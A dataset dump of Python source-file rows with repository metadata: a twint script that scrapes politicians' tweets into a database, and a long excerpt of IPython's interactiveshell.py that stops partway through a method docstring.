hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2caf5d5429d89c7da649be2382fb440d0361ac1a | 1,950 | py | Python | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | import database_model as db
from database_model import Politician, Tweet, Hashtag
import sqlalchemy
import twint
import arrow
if __name__ == "__main__":
fill_database()
| 28.26087 | 96 | 0.547179 | import database_model as db
from database_model import Politician, Tweet, Hashtag
import sqlalchemy
import twint
import arrow
def get_tweets(twitter_handle,since,until):
c = twint.Config()
c.Username = twitter_handle
c.Pandas = True
c.Hide_output = True
#c.Retries_count = 1
c.Retweets = True
if since:
c.Since = since.format('YYYY-MM-DD 00:00:00')
else:
c.Since = '2017-09-24 00:00:00'
if until:
c.Until = until.format('YYYY-MM-DD 23:59:59')
#c.Limit = 200
twint.run.Search(c)
return twint.storage.panda.Tweets_df
def fill_database():
session = db.get_session()
politicians =session.query(Politician).all()
counter = 0
for politician in politicians:
counter += 1
print(counter, politician.twitter_handle)
if len(politician.tweets):
print("already scaned, skiping")
continue
if not politician.twitter_handle:
continue
tweets = get_tweets(politician.twitter_handle,politician.start_date,politician.end_date)
try:
for index, tweet in tweets.iterrows():
# print(tweet)
t = Tweet(
id = tweet["id"],
date = arrow.get(tweet["date"]),
text = tweet["tweet"],
nlikes = tweet["nlikes"],
nreplie = tweet["nreplies"],
nretweets = tweet["nretweets"]
)
session.add(t)
politician.tweets.append(t)
for hashtag in tweet["hashtags"]:
h = Hashtag(tag=hashtag[1:])
t.hashtags.append(h)
session.add(h)
session.commit()
except sqlalchemy.exc.IntegrityError:
session.rollback()
continue
if __name__ == "__main__":
fill_database()
| 1,727 | 0 | 46 |
6ab436fc56656bd0a166758dd3675cc7c4ea8e81 | 153,705 | py | Python | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 3 | 2021-03-29T19:21:08.000Z | 2021-12-31T09:30:11.000Z | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 2 | 2021-12-04T12:51:07.000Z | 2021-12-04T16:49:18.000Z | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 1 | 2021-03-30T05:02:53.000Z | 2021-03-30T05:02:53.000Z | # -*- coding: utf-8 -*-
"""Main IPython class."""
#-----------------------------------------------------------------------------
# Copyright (C) 2001 Janko Hauser <jhauser@zscout.de>
# Copyright (C) 2001-2007 Fernando Perez. <fperez@colorado.edu>
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import abc
import ast
import atexit
import builtins as builtin_mod
import functools
import inspect
import os
import re
import runpy
import sys
import tempfile
import traceback
import types
import subprocess
import warnings
from io import open as io_open
from pickleshare import PickleShareDB
from traitlets.config.configurable import SingletonConfigurable
from traitlets.utils.importstring import import_item
from IPython.core import oinspect
from IPython.core import magic
from IPython.core import page
from IPython.core import prefilter
from IPython.core import ultratb
from IPython.core.alias import Alias, AliasManager
from IPython.core.autocall import ExitAutocall
from IPython.core.builtin_trap import BuiltinTrap
from IPython.core.events import EventManager, available_events
from IPython.core.compilerop import CachingCompiler, check_linecache_ipython
from IPython.core.debugger import Pdb
from IPython.core.display_trap import DisplayTrap
from IPython.core.displayhook import DisplayHook
from IPython.core.displaypub import DisplayPublisher
from IPython.core.error import InputRejected, UsageError
from IPython.core.extensions import ExtensionManager
from IPython.core.formatters import DisplayFormatter
from IPython.core.history import HistoryManager
from IPython.core.inputtransformer2 import ESC_MAGIC, ESC_MAGIC2
from IPython.core.logger import Logger
from IPython.core.macro import Macro
from IPython.core.payload import PayloadManager
from IPython.core.prefilter import PrefilterManager
from IPython.core.profiledir import ProfileDir
from IPython.core.usage import default_banner
from IPython.display import display
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import py3compat
from IPython.utils import openpy
from IPython.utils.decorators import undoc
from IPython.utils.io import ask_yes_no
from IPython.utils.ipstruct import Struct
from IPython.paths import get_ipython_dir
from IPython.utils.path import get_home_dir, get_py_filename, ensure_dir_exists
from IPython.utils.process import system, getoutput
from IPython.utils.strdispatch import StrDispatch
from IPython.utils.syspathcontext import prepended_to_syspath
from IPython.utils.text import format_screen, LSString, SList, DollarFormatter
from IPython.utils.tempdir import TemporaryDirectory
from traitlets import (
Integer, Bool, CaselessStrEnum, Enum, List, Dict, Unicode, Instance, Type,
observe, default, validate, Any
)
from warnings import warn
from logging import error
import IPython.core.hooks
from typing import List as ListType, Tuple, Optional
from ast import AST
# NoOpContext is deprecated, but ipykernel imports it from here.
# See https://github.com/ipython/ipykernel/issues/157
# (2016, let's try to remove than in IPython 8.0)
from IPython.utils.contexts import NoOpContext
try:
import docrepr.sphinxify as sphx
except ImportError:
sphinxify = None
class ProvisionalWarning(DeprecationWarning):
"""
Warning class for unstable features
"""
pass
if sys.version_info > (3,8):
from ast import Module
else :
# mock the new API, ignore second argument
# see https://github.com/ipython/ipython/issues/11590
from ast import Module as OriginalModule
Module = lambda nodelist, type_ignores: OriginalModule(nodelist)
if sys.version_info > (3,6):
_assign_nodes = (ast.AugAssign, ast.AnnAssign, ast.Assign)
_single_targets_nodes = (ast.AugAssign, ast.AnnAssign)
else:
_assign_nodes = (ast.AugAssign, ast.Assign )
_single_targets_nodes = (ast.AugAssign, )
#-----------------------------------------------------------------------------
# Await Helpers
#-----------------------------------------------------------------------------
def removed_co_newlocals(function:types.FunctionType) -> types.FunctionType:
"""Return a function that do not create a new local scope.
Given a function, create a clone of this function where the co_newlocal flag
has been removed, making this function code actually run in the sourounding
scope.
We need this in order to run asynchronous code in user level namespace.
"""
from types import CodeType, FunctionType
CO_NEWLOCALS = 0x0002
code = function.__code__
new_co_flags = code.co_flags & ~CO_NEWLOCALS
if sys.version_info > (3, 8, 0, 'alpha', 3):
new_code = code.replace(co_flags=new_co_flags)
else:
new_code = CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
new_co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
code.co_name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars
)
return FunctionType(new_code, globals(), function.__name__, function.__defaults__)
# we still need to run things using the asyncio eventloop, but there is no
# async integration
from .async_helpers import (_asyncio_runner, _asyncify, _pseudo_sync_runner)
from .async_helpers import _curio_runner, _trio_runner, _should_be_async
def _ast_asyncify(cell:str, wrapper_name:str) -> ast.Module:
"""
Parse a cell with top-level await and modify the AST to be able to run it later.
Parameter
---------
cell: str
The code cell to asyncronify
wrapper_name: str
The name of the function to be used to wrap the passed `cell`. It is
advised to **not** use a python identifier in order to not pollute the
global namespace in which the function will be ran.
Return
------
A module object AST containing **one** function named `wrapper_name`.
The given code is wrapped in a async-def function, parsed into an AST, and
the resulting function definition AST is modified to return the last
expression.
The last expression or await node is moved into a return statement at the
end of the function, and removed from its original location. If the last
node is not Expr or Await nothing is done.
The function `__code__` will need to be later modified (by
``removed_co_newlocals``) in a subsequent step to not create new `locals()`
meaning that the local and global scope are the same, ie as if the body of
the function was at module level.
Lastly a call to `locals()` is made just before the last expression of the
function, or just after the last assignment or statement to make sure the
global dict is updated as python function work with a local fast cache which
is updated only on `local()` calls.
"""
from ast import Expr, Await, Return
if sys.version_info >= (3,8):
return ast.parse(cell)
tree = ast.parse(_asyncify(cell))
function_def = tree.body[0]
function_def.name = wrapper_name
try_block = function_def.body[0]
lastexpr = try_block.body[-1]
if isinstance(lastexpr, (Expr, Await)):
try_block.body[-1] = Return(lastexpr.value)
ast.fix_missing_locations(tree)
return tree
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
# compiled regexps for autoindent management
dedent_re = re.compile(r'^\s+raise|^\s+return|^\s+pass')
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
@undoc
def softspace(file, newvalue):
"""Copied from code.py, to remove the dependency"""
oldvalue = 0
try:
oldvalue = file.softspace
except AttributeError:
pass
try:
file.softspace = newvalue
except (AttributeError, TypeError):
# "attribute-less object" or "read-only attributes"
pass
return oldvalue
@undoc
def get_default_colors():
"DEPRECATED"
warn('get_default_color is deprecated since IPython 5.0, and returns `Neutral` on all platforms.',
DeprecationWarning, stacklevel=2)
return 'Neutral'
class SeparateUnicode(Unicode):
r"""A Unicode subclass to validate separate_in, separate_out, etc.
This is a Unicode based trait that converts '0'->'' and ``'\\n'->'\n'``.
"""
@undoc
class DummyMod(object):
"""A dummy module used for IPython's interactive module when
a namespace must be assigned to the module's __dict__."""
__spec__ = None
class ExecutionInfo(object):
"""The arguments used for a call to :meth:`InteractiveShell.run_cell`
Stores information about what is going to happen.
"""
raw_cell = None
store_history = False
silent = False
shell_futures = True
class ExecutionResult(object):
"""The result of a call to :meth:`InteractiveShell.run_cell`
Stores information about what took place.
"""
execution_count = None
error_before_exec = None
error_in_exec = None
info = None
result = None
@property
def raise_error(self):
"""Reraises error if `success` is `False`, otherwise does nothing"""
if self.error_before_exec is not None:
raise self.error_before_exec
if self.error_in_exec is not None:
raise self.error_in_exec
class InteractiveShell(SingletonConfigurable):
"""An enhanced, interactive shell for Python."""
_instance = None
ast_transformers = List([], help=
"""
A list of ast.NodeTransformer subclass instances, which will be applied
to user input before code is run.
"""
).tag(config=True)
autocall = Enum((0,1,2), default_value=0, help=
"""
Make IPython automatically call any callable object even if you didn't
type explicit parentheses. For example, 'str 43' becomes 'str(43)'
automatically. The value can be '0' to disable the feature, '1' for
'smart' autocall, where it is not applied if there are no more
arguments on the line, and '2' for 'full' autocall, where all callable
objects are automatically called (even if no arguments are present).
"""
).tag(config=True)
autoindent = Bool(True, help=
"""
Autoindent IPython code entered interactively.
"""
).tag(config=True)
autoawait = Bool(True, help=
"""
Automatically run await statement in the top level repl.
"""
).tag(config=True)
loop_runner_map ={
'asyncio':(_asyncio_runner, True),
'curio':(_curio_runner, True),
'trio':(_trio_runner, True),
'sync': (_pseudo_sync_runner, False)
}
loop_runner = Any(default_value="IPython.core.interactiveshell._asyncio_runner",
allow_none=True,
help="""Select the loop runner that will be used to execute top-level asynchronous code"""
).tag(config=True)
@default('loop_runner')
@validate('loop_runner')
automagic = Bool(True, help=
"""
Enable magic commands to be called without the leading %.
"""
).tag(config=True)
banner1 = Unicode(default_banner,
help="""The part of the banner to be printed before the profile"""
).tag(config=True)
banner2 = Unicode('',
help="""The part of the banner to be printed after the profile"""
).tag(config=True)
cache_size = Integer(1000, help=
"""
Set the size of the output cache. The default is 1000, you can
change it permanently in your config file. Setting it to 0 completely
disables the caching system, and the minimum value accepted is 3 (if
you provide a value less than 3, it is reset to 0 and a warning is
issued). This limit is defined because otherwise you'll spend more
time re-flushing a too small cache than working
"""
).tag(config=True)
color_info = Bool(True, help=
"""
Use colors for displaying information about objects. Because this
information is passed through a pager (like 'less'), and some pagers
get confused with color codes, this capability can be turned off.
"""
).tag(config=True)
colors = CaselessStrEnum(('Neutral', 'NoColor','LightBG','Linux'),
default_value='Neutral',
help="Set the color scheme (NoColor, Neutral, Linux, or LightBG)."
).tag(config=True)
debug = Bool(False).tag(config=True)
disable_failing_post_execute = Bool(False,
help="Don't call post-execute functions that have failed in the past."
).tag(config=True)
display_formatter = Instance(DisplayFormatter, allow_none=True)
displayhook_class = Type(DisplayHook)
display_pub_class = Type(DisplayPublisher)
compiler_class = Type(CachingCompiler)
sphinxify_docstring = Bool(False, help=
"""
Enables rich html representation of docstrings. (This requires the
docrepr module).
""").tag(config=True)
@observe("sphinxify_docstring")
enable_html_pager = Bool(False, help=
"""
(Provisional API) enables html representation in mime bundles sent
to pagers.
""").tag(config=True)
@observe("enable_html_pager")
data_pub_class = None
exit_now = Bool(False)
exiter = Instance(ExitAutocall)
@default('exiter')
# Monotonically increasing execution counter
execution_count = Integer(1)
filename = Unicode("<ipython console>")
ipython_dir= Unicode('').tag(config=True) # Set to get_ipython_dir() in __init__
# Used to transform cells before running them, and check whether code is complete
input_transformer_manager = Instance('IPython.core.inputtransformer2.TransformerManager',
())
@property
input_transformers_post = List([],
help="A list of string input transformers, to be applied after IPython's "
"own input transformations."
)
@property
def input_splitter(self):
"""Make this available for backward compatibility (pre-7.0 release) with existing code.
For example, ipykernel ipykernel currently uses
`shell.input_splitter.check_complete`
"""
from warnings import warn
warn("`input_splitter` is deprecated since IPython 7.0, prefer `input_transformer_manager`.",
DeprecationWarning, stacklevel=2
)
return self.input_transformer_manager
logstart = Bool(False, help=
"""
Start logging to the default log file in overwrite mode.
Use `logappend` to specify a log file to **append** logs to.
"""
).tag(config=True)
logfile = Unicode('', help=
"""
The name of the logfile to use.
"""
).tag(config=True)
logappend = Unicode('', help=
"""
Start logging to the given file in append mode.
Use `logfile` to specify a log file to **overwrite** logs to.
"""
).tag(config=True)
object_info_string_level = Enum((0,1,2), default_value=0,
).tag(config=True)
pdb = Bool(False, help=
"""
Automatically call the pdb debugger after every exception.
"""
).tag(config=True)
display_page = Bool(False,
help="""If True, anything that would be passed to the pager
will be displayed as regular output instead."""
).tag(config=True)
# deprecated prompt traits:
prompt_in1 = Unicode('In [\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_in2 = Unicode(' .\\D.: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_out = Unicode('Out[\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompts_pad_left = Bool(True,
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
@observe('prompt_in1', 'prompt_in2', 'prompt_out', 'prompt_pad_left')
show_rewritten_input = Bool(True,
help="Show rewritten input, e.g. for autocall."
).tag(config=True)
quiet = Bool(False).tag(config=True)
history_length = Integer(10000,
help='Total length of command history'
).tag(config=True)
history_load_length = Integer(1000, help=
"""
The number of saved history entries to be loaded
into the history buffer at startup.
"""
).tag(config=True)
ast_node_interactivity = Enum(['all', 'last', 'last_expr', 'none', 'last_expr_or_assign'],
default_value='last_expr',
help="""
'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying
which nodes should be run interactively (displaying output from expressions).
"""
).tag(config=True)
# TODO: this part of prompt management should be moved to the frontends.
# Use custom TraitTypes that convert '0'->'' and '\\n'->'\n'
separate_in = SeparateUnicode('\n').tag(config=True)
separate_out = SeparateUnicode('').tag(config=True)
separate_out2 = SeparateUnicode('').tag(config=True)
wildcards_case_sensitive = Bool(True).tag(config=True)
xmode = CaselessStrEnum(('Context', 'Plain', 'Verbose', 'Minimal'),
default_value='Context',
help="Switch modes for the IPython exception handlers."
).tag(config=True)
# Subcomponents of InteractiveShell
alias_manager = Instance('IPython.core.alias.AliasManager', allow_none=True)
prefilter_manager = Instance('IPython.core.prefilter.PrefilterManager', allow_none=True)
builtin_trap = Instance('IPython.core.builtin_trap.BuiltinTrap', allow_none=True)
display_trap = Instance('IPython.core.display_trap.DisplayTrap', allow_none=True)
extension_manager = Instance('IPython.core.extensions.ExtensionManager', allow_none=True)
payload_manager = Instance('IPython.core.payload.PayloadManager', allow_none=True)
history_manager = Instance('IPython.core.history.HistoryAccessorBase', allow_none=True)
magics_manager = Instance('IPython.core.magic.MagicsManager', allow_none=True)
profile_dir = Instance('IPython.core.application.ProfileDir', allow_none=True)
@property
# Private interface
_post_execute = Dict()
# Tracks any GUI loop loaded for pylab
pylab_gui_select = None
last_execution_succeeded = Bool(True, help='Did last executed command succeeded')
last_execution_result = Instance('IPython.core.interactiveshell.ExecutionResult', help='Result of executing the last command', allow_none=True)
def get_ipython(self):
"""Return the currently running IPython instance."""
return self
#-------------------------------------------------------------------------
# Trait changed handlers
#-------------------------------------------------------------------------
@observe('ipython_dir')
def set_autoindent(self,value=None):
"""Set the autoindent flag.
If called with no arguments, it acts as a toggle."""
if value is None:
self.autoindent = not self.autoindent
else:
self.autoindent = value
#-------------------------------------------------------------------------
# init_* methods called by __init__
#-------------------------------------------------------------------------
def init_environment(self):
"""Any changes we need to make to the user's environment."""
pass
@observe('colors')
def init_logstart(self):
"""Initialize logging in case it was requested at the command line.
"""
if self.logappend:
self.magic('logstart %s append' % self.logappend)
elif self.logfile:
self.magic('logstart %s' % self.logfile)
elif self.logstart:
self.magic('logstart')
def init_deprecation_warnings(self):
"""
register default filter for deprecation warning.
This will allow deprecation warning of function used interactively to show
warning to users, and still hide deprecation warning from libraries import.
"""
if sys.version_info < (3,7):
warnings.filterwarnings("default", category=DeprecationWarning, module=self.user_ns.get("__name__"))
@observe('colors')
def init_virtualenv(self):
"""Add a virtualenv to sys.path so the user can import modules from it.
This isn't perfect: it doesn't use the Python interpreter with which the
virtualenv was built, and it ignores the --no-site-packages option. A
warning will appear suggesting the user installs IPython in the
virtualenv, but for many cases, it probably works well enough.
Adapted from code snippets online.
http://blog.ufsoft.org/2009/1/29/ipython-and-virtualenv
"""
if 'VIRTUAL_ENV' not in os.environ:
# Not in a virtualenv
return
p = os.path.normcase(sys.executable)
p_venv = os.path.normcase(os.environ['VIRTUAL_ENV'])
# executable path should end like /bin/python or \\scripts\\python.exe
p_exe_up2 = os.path.dirname(os.path.dirname(p))
if p_exe_up2 and os.path.exists(p_venv) and os.path.samefile(p_exe_up2, p_venv):
# Our exe is inside the virtualenv, don't need to do anything.
return
# fallback venv detection:
# stdlib venv may symlink sys.executable, so we can't use realpath.
# but others can symlink *to* the venv Python, so we can't just use sys.executable.
# So we just check every item in the symlink tree (generally <= 3)
paths = [p]
while os.path.islink(p):
p = os.path.normcase(os.path.join(os.path.dirname(p), os.readlink(p)))
paths.append(p)
# In Cygwin paths like "c:\..." and '\cygdrive\c\...' are possible
if p_venv.startswith('\\cygdrive'):
p_venv = p_venv[11:]
elif len(p_venv) >= 2 and p_venv[1] == ':':
p_venv = p_venv[2:]
if any(p_venv in p for p in paths):
# Running properly in the virtualenv, don't need to do anything
return
warn("Attempting to work in a virtualenv. If you encounter problems, please "
"install IPython inside the virtualenv.")
if sys.platform == "win32":
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'Lib', 'site-packages')
else:
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'lib',
'python%d.%d' % sys.version_info[:2], 'site-packages')
import site
sys.path.insert(0, virtual_env)
site.addsitedir(virtual_env)
#-------------------------------------------------------------------------
# Things related to injections into the sys module
#-------------------------------------------------------------------------
def save_sys_module_state(self):
"""Save the state of hooks in the sys module.
This has to be called after self.user_module is created.
"""
self._orig_sys_module_state = {'stdin': sys.stdin,
'stdout': sys.stdout,
'stderr': sys.stderr,
'excepthook': sys.excepthook}
self._orig_sys_modules_main_name = self.user_module.__name__
self._orig_sys_modules_main_mod = sys.modules.get(self.user_module.__name__)
def restore_sys_module_state(self):
"""Restore the state of the sys module."""
try:
for k, v in self._orig_sys_module_state.items():
setattr(sys, k, v)
except AttributeError:
pass
# Reset what what done in self.init_sys_modules
if self._orig_sys_modules_main_mod is not None:
sys.modules[self._orig_sys_modules_main_name] = self._orig_sys_modules_main_mod
#-------------------------------------------------------------------------
# Things related to the banner
#-------------------------------------------------------------------------
@property
#-------------------------------------------------------------------------
# Things related to hooks
#-------------------------------------------------------------------------
def set_hook(self,name,hook, priority=50, str_key=None, re_key=None,
_warn_deprecated=True):
"""set_hook(name,hook) -> sets an internal IPython hook.
IPython exposes some of its internal API as user-modifiable hooks. By
adding your function to one of these hooks, you can modify IPython's
behavior to call at runtime your own routines."""
# At some point in the future, this should validate the hook before it
# accepts it. Probably at least check that the hook takes the number
# of args it's supposed to.
f = types.MethodType(hook,self)
# check if the hook is for strdispatcher first
if str_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_s(str_key, f, priority )
self.strdispatchers[name] = sdp
return
if re_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_re(re.compile(re_key), f, priority )
self.strdispatchers[name] = sdp
return
dp = getattr(self.hooks, name, None)
if name not in IPython.core.hooks.__all__:
print("Warning! Hook '%s' is not one of %s" % \
(name, IPython.core.hooks.__all__ ))
if _warn_deprecated and (name in IPython.core.hooks.deprecated):
alternative = IPython.core.hooks.deprecated[name]
warn("Hook {} is deprecated. Use {} instead.".format(name, alternative), stacklevel=2)
if not dp:
dp = IPython.core.hooks.CommandChainDispatcher()
try:
dp.add(f,priority)
except AttributeError:
# it was not commandchain, plain old func - replace
dp = f
setattr(self.hooks,name, dp)
#-------------------------------------------------------------------------
# Things related to events
#-------------------------------------------------------------------------
def register_post_execute(self, func):
"""DEPRECATED: Use ip.events.register('post_run_cell', func)
Register a function for calling after code execution.
"""
warn("ip.register_post_execute is deprecated, use "
"ip.events.register('post_run_cell', func) instead.", stacklevel=2)
self.events.register('post_run_cell', func)
#-------------------------------------------------------------------------
# Things related to the "main" module
#-------------------------------------------------------------------------
def new_main_mod(self, filename, modname):
"""Return a new 'main' module object for user code execution.
``filename`` should be the path of the script which will be run in the
module. Requests with the same filename will get the same module, with
its namespace cleared.
``modname`` should be the module name - normally either '__main__' or
the basename of the file without the extension.
When scripts are executed via %run, we must keep a reference to their
__main__ module around so that Python doesn't
clear it, rendering references to module globals useless.
This method keeps said reference in a private dict, keyed by the
absolute path of the script. This way, for multiple executions of the
same script we only keep one copy of the namespace (the last one),
thus preventing memory leaks from old references while allowing the
objects from the last execution to be accessible.
"""
filename = os.path.abspath(filename)
try:
main_mod = self._main_mod_cache[filename]
except KeyError:
main_mod = self._main_mod_cache[filename] = types.ModuleType(
modname,
doc="Module created for script run in IPython")
else:
main_mod.__dict__.clear()
main_mod.__name__ = modname
main_mod.__file__ = filename
# It seems pydoc (and perhaps others) needs any module instance to
# implement a __nonzero__ method
main_mod.__nonzero__ = lambda : True
return main_mod
def clear_main_mod_cache(self):
"""Clear the cache of main modules.
Mainly for use by utilities like %reset.
Examples
--------
In [15]: import IPython
In [16]: m = _ip.new_main_mod(IPython.__file__, 'IPython')
In [17]: len(_ip._main_mod_cache) > 0
Out[17]: True
In [18]: _ip.clear_main_mod_cache()
In [19]: len(_ip._main_mod_cache) == 0
Out[19]: True
"""
self._main_mod_cache.clear()
#-------------------------------------------------------------------------
# Things related to debugging
#-------------------------------------------------------------------------
call_pdb = property(_get_call_pdb,_set_call_pdb,None,
'Control auto-activation of pdb at exceptions')
def debugger(self,force=False):
"""Call the pdb debugger.
Keywords:
- force(False): by default, this routine checks the instance call_pdb
flag and does not actually invoke the debugger if the flag is false.
The 'force' option forces the debugger to activate even if the flag
is false.
"""
if not (force or self.call_pdb):
return
if not hasattr(sys,'last_traceback'):
error('No traceback has been produced, nothing to debug.')
return
self.InteractiveTB.debugger(force=True)
#-------------------------------------------------------------------------
# Things related to IPython's various namespaces
#-------------------------------------------------------------------------
default_user_namespaces = True
@property
def prepare_user_module(self, user_module=None, user_ns=None):
"""Prepare the module and namespace in which user code will be run.
When IPython is started normally, both parameters are None: a new module
is created automatically, and its __dict__ used as the namespace.
If only user_module is provided, its __dict__ is used as the namespace.
If only user_ns is provided, a dummy module is created, and user_ns
becomes the global namespace. If both are provided (as they may be
when embedding), user_ns is the local namespace, and user_module
provides the global namespace.
Parameters
----------
user_module : module, optional
The current user module in which IPython is being run. If None,
a clean module will be created.
user_ns : dict, optional
A namespace in which to run interactive commands.
Returns
-------
A tuple of user_module and user_ns, each properly initialised.
"""
if user_module is None and user_ns is not None:
user_ns.setdefault("__name__", "__main__")
user_module = DummyMod()
user_module.__dict__ = user_ns
if user_module is None:
user_module = types.ModuleType("__main__",
doc="Automatically created module for IPython interactive environment")
# We must ensure that __builtin__ (without the final 's') is always
# available and pointing to the __builtin__ *module*. For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
user_module.__dict__.setdefault('__builtin__', builtin_mod)
user_module.__dict__.setdefault('__builtins__', builtin_mod)
if user_ns is None:
user_ns = user_module.__dict__
return user_module, user_ns
def init_user_ns(self):
"""Initialize all user-visible namespaces to their minimum defaults.
Certain history lists are also initialized here, as they effectively
act as user namespaces.
Notes
-----
All data structures here are only filled in, they are NOT reset by this
method. If they were not empty before, data will simply be added to
them.
"""
# This function works in two parts: first we put a few things in
# user_ns, and we sync that contents into user_ns_hidden so that these
# initial variables aren't shown by %who. After the sync, we add the
# rest of what we *do* want the user to see with %who even on a new
# session (probably nothing, so they really only see their own stuff)
# The user dict must *always* have a __builtin__ reference to the
# Python standard __builtin__ namespace, which must be imported.
# This is so that certain operations in prompt evaluation can be
# reliably executed with builtins. Note that we can NOT use
# __builtins__ (note the 's'), because that can either be a dict or a
# module, and can even mutate at runtime, depending on the context
# (Python makes no guarantees on it). In contrast, __builtin__ is
# always a module object, though it must be explicitly imported.
# For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
ns = {}
# make global variables for user access to the histories
ns['_ih'] = self.history_manager.input_hist_parsed
ns['_oh'] = self.history_manager.output_hist
ns['_dh'] = self.history_manager.dir_hist
# user aliases to input and output histories. These shouldn't show up
# in %who, as they can have very large reprs.
ns['In'] = self.history_manager.input_hist_parsed
ns['Out'] = self.history_manager.output_hist
# Store myself as the public api!!!
ns['get_ipython'] = self.get_ipython
ns['exit'] = self.exiter
ns['quit'] = self.exiter
# Sync what we've added so far to user_ns_hidden so these aren't seen
# by %who
self.user_ns_hidden.update(ns)
# Anything put into ns now would show up in %who. Think twice before
# putting anything here, as we really want %who to show the user their
# stuff, not our variables.
# Finally, update the real user's namespace
self.user_ns.update(ns)
@property
def all_ns_refs(self):
"""Get a list of references to all the namespace dictionaries in which
IPython might store a user-created object.
Note that this does not include the displayhook, which also caches
objects from the output."""
return [self.user_ns, self.user_global_ns, self.user_ns_hidden] + \
[m.__dict__ for m in self._main_mod_cache.values()]
def reset(self, new_session=True, aggressive=False):
"""Clear all internal namespaces, and attempt to release references to
user objects.
If new_session is True, a new history session will be opened.
"""
# Clear histories
self.history_manager.reset(new_session)
# Reset counter used to index all histories
if new_session:
self.execution_count = 1
# Reset last execution result
self.last_execution_succeeded = True
self.last_execution_result = None
# Flush cached output items
if self.displayhook.do_full_cache:
self.displayhook.flush()
# The main execution namespaces must be cleared very carefully,
# skipping the deletion of the builtin-related keys, because doing so
# would cause errors in many object's __del__ methods.
if self.user_ns is not self.user_global_ns:
self.user_ns.clear()
ns = self.user_global_ns
drop_keys = set(ns.keys())
drop_keys.discard('__builtin__')
drop_keys.discard('__builtins__')
drop_keys.discard('__name__')
for k in drop_keys:
del ns[k]
self.user_ns_hidden.clear()
# Restore the user namespaces to minimal usability
self.init_user_ns()
if aggressive and not hasattr(self, "_sys_modules_keys"):
print("Cannot restore sys.module, no snapshot")
elif aggressive:
print("culling sys module...")
current_keys = set(sys.modules.keys())
for k in current_keys - self._sys_modules_keys:
if k.startswith("multiprocessing"):
continue
del sys.modules[k]
# Restore the default and user aliases
self.alias_manager.clear_aliases()
self.alias_manager.init_aliases()
# Now define aliases that only make sense on the terminal, because they
# need direct access to the console in a way that we can't emulate in
# GUI or web frontend
if os.name == 'posix':
for cmd in ('clear', 'more', 'less', 'man'):
if cmd not in self.magics_manager.magics['line']:
self.alias_manager.soft_define_alias(cmd, cmd)
# Flush the private list of module references kept for script
# execution protection
self.clear_main_mod_cache()
def del_var(self, varname, by_name=False):
"""Delete a variable from the various namespaces, so that, as
far as possible, we're not keeping any hidden references to it.
Parameters
----------
varname : str
The name of the variable to delete.
by_name : bool
If True, delete variables with the given name in each
namespace. If False (default), find the variable in the user
namespace, and delete references to it.
"""
